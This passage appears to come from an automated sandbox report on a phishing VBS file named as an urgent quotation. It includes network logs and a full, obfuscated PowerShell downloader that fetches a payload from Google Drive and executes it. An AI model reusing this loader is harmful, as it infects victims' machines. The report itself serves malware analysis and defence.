                                  2024-09-30 08:00:06 UTC | 121               | OUT       | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 08:00:06 UTC | 1319              | IN        | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 08:00:06 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Pv6J5tsEOkCknrObQT3-HQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close



                                  Target ID:0
                                  Start time:03:57:59
                                  Start date:30/09/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
                                  Imagebase:0x7ff605190000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:03:58:02
                                  Start date:30/09/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. 
';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. 
nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.UndDstao riwse,nU.plMuso taaR td .nFRddi llskye l(Mal$tunCIndeT.ar ottKomiC nf aiDraaa ob ckiAcilUnniTartUnfyske, no$RatP crrPraoOffsD etKvah anoKondBaaosprnstitOphi occ msAlt) ed ';$Prosthodontics=$Dutiable;Trolddomskunsternes (Fabrikskomplekserne 'Mil$Oveg BalHngoFotbPrma oL Pr:,acs stI .hdCouOundN snIMa a B sH,u= En( CotHjuesttsUnsTExi-KispRaaaCout skHRag Ebu$,omP ierK.io HusLant enHT kOTredD rO Brnsk,TAutIUn c PasHa,) Re ');while (!$sidonias) {Trolddomskunsternes (Fabrikskomplekserne ' K $Gafghkels ioPolbIntasinl.el:El U Dossvrl stiTign TigEtheMk,nUn s Kl=To $stot erM au sye Af ') ;Trolddomskunsternes $Bufferkapaciteterne;Trolddomskunsternes (Fabrikskomplekserne 'V lssoat MiaMatrBettf,j-WatsNislsike svePlepFas Epi4Chi ');Trolddomskunsternes (Fabrikskomplekserne 'F g$P.rgC llGaloHarb C.aItal Fo: G.sBloiHypd aso A,n,tai Nua OvsDem=Clu( ,rTD teAn seartFll-WogPId,aUndtn th su Ild$UnsPCl rBetosprsMyttslah o,oLordUbeoKupnGrotO eiKo cTrisG i)Kah ') ;Trolddomskunsternes (Fabrikskomplekserne 'squ$Audg EilB.aoBorbFesaIn lFac: coOs.rrAf tDewhP ro MacKape dsrE.ta FltKeliIsotErki llc ro= k$ U gse l s os jb osa llBow: UnU Kanra dWeaeBharslucTrarundoPlasVissZoni PsnMedgjus+Bi,+ Al% yp$B sP esrHareForiEvim ncpOpsostar Retdat.HvicDrno FiuI pnReotRec ') ;$Certifiability=$Preimport[$Orthoceratitic];}$Vejlenser=275493;$Cirkelines=30624;Trolddomskunsternes (Fabrikskomplekserne 'For$ FegtimlBraoKilbGolaOlalTo.:s nM ElaCorsHelsOveeWeitsm eOver PriFascpep Tra=Epi AnGRapesemtMus-HovCMauoho,nRevt steVinnAcatMel B r$tykPQu,r.haoBlusB at Rah CyoFlidsuioPron hltO,ei stc isLyk ');Trolddomskunsternes (Fabrikskomplekserne 
'Ine$AlagGtel,enoHygb MraNeglClo:CanIdiansolfTr i PrnChaisrktUn.aBehtAfseP ad su l=N g ,jl[Be s,awyChisTuntsl,eNydm sp. ArCvero usnNonvFuteA.erAt tper]ski:Vej:TofFLetrKomoPremVarBEntaUdtsElseFes6 lu4 B sstitcsnrfugistrnsvegDri(Fra$UnsMKisaTassTo.sBraeWhatNyaes.orMusi ascVer) Bo ');Trolddomskunsternes (Fabrikskomplekserne ' dr$BefgsvilHeao ocb p.aBealZi :Un MR ko HyncesiUn s,ontPeli Fos R kOl e .v D g=dor Xip[UdhsV zyGuasB ktPhyeRapmObj.st TFo,e Rux tetGra. MoEMisn Glcstao ldD ni stnFusgbor]ent:kom: emAn nsBasCHe It aIGon. G,GItae sttAl,sburtJusr M.iUdsns mg e( As$ aIK in opfBini.efnsemiflet EfaUndt laesmud.in) Dr ');Trolddomskunsternes (Fabrikskomplekserne 'Brb$D,igB nlPreoHurb,oraRealUni: rTAngrTrao K,u Mev,oie rluPyrrGarsodi1 In5Me,6,ct=sol$AllMB yo O n I i.yrss otNseibagsAp.kopbeMoo. ndsAp usaubin sDiatVanr BoiHosnTe.gAfr(Cra$ProVsyne OdjKonlHjee.ilnDe sToge Norsat,afh$damC W iGe r Miksoge L lGauiBranjobeIn s as)Pen ');Trolddomskunsternes $Trouveurs156;"
                                  Imagebase:0x7ff760310000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Target ID:3
                                  Start time:03:58:02
                                  Start date:30/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638969229.00007FF886F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886f70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: UAWA
                                    • API String ID: 0-1492024814
                                    • Opcode ID: 974232fb0fee142f105286e790c3b3052715284214b7086769dff2bcdf4a882a
                                    • Instruction ID: 8067bd78fab202812346d518638eb4aaea61dc8ada8cafc57646d93028dbd9d6
                                    • Opcode Fuzzy Hash: 974232fb0fee142f105286e790c3b3052715284214b7086769dff2bcdf4a882a
                                    • Instruction Fuzzy Hash: 99F1C162E0DECA0FE39696A858552B57BE1FF563A0B0901FED04DC71E3E918AC06C352
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638969229.00007FF886F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886f70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5ba4151a5cb0ff3edb79fe70bb7825de9fc52e4e7bb6f776b89f35337405a5ce
                                    • Instruction ID: 61325ced2371a6c275d9a04d819a401122ca942b249b9e7ce843bfea45b8352d
                                    • Opcode Fuzzy Hash: 5ba4151a5cb0ff3edb79fe70bb7825de9fc52e4e7bb6f776b89f35337405a5ce
                                    • Instruction Fuzzy Hash: 8DE11321E2EECE4FE7A5AB6848159B5BBA1FF153A0B1801FED14DC7193DA19EC05C342
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638969229.00007FF886F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886f70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e1a77e1845e63a33edc3d45a10a48a97149954f133a6e9ddc25bc7b6d3156ea8
                                    • Instruction ID: cc552d6cdfd1444b0f509ff8fc0b74d98796ef9ffd64e58775b926af2ec23822
                                    • Opcode Fuzzy Hash: e1a77e1845e63a33edc3d45a10a48a97149954f133a6e9ddc25bc7b6d3156ea8
                                    • Instruction Fuzzy Hash: 51210422E1DECE4BF3A996A81C55274E6D2FF973B0B9801BAD10CC31D2ED18EC05C602
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638969229.00007FF886F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886f70000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d2b2877f3b3fd90174bc34b8a51495ff0726da8c9cde8b941bf0bd7bb8a3a849
                                    • Instruction ID: c6f2768aa399d80802742f15ab0873fab5df48aae9aefd9d9bfa8c2b618de66c
                                    • Opcode Fuzzy Hash: d2b2877f3b3fd90174bc34b8a51495ff0726da8c9cde8b941bf0bd7bb8a3a849
                                    • Instruction Fuzzy Hash: BC21BF66E0EAC91FF351E62818551B52AE1BF666A0B0800FEE089C71E7DD089C0EC312
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2638555492.00007FF886EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ff886ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                    • Instruction ID: 0b8cf5a8a580cb41ac4e944373a343cee0b316a6b9801bd6ca53929c1fc96192
                                    • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                    • Instruction Fuzzy Hash: 0701A73111CB0C8FD744EF0CE451AB5B3E0FB95360F10052EE58AC3651D636E882CB42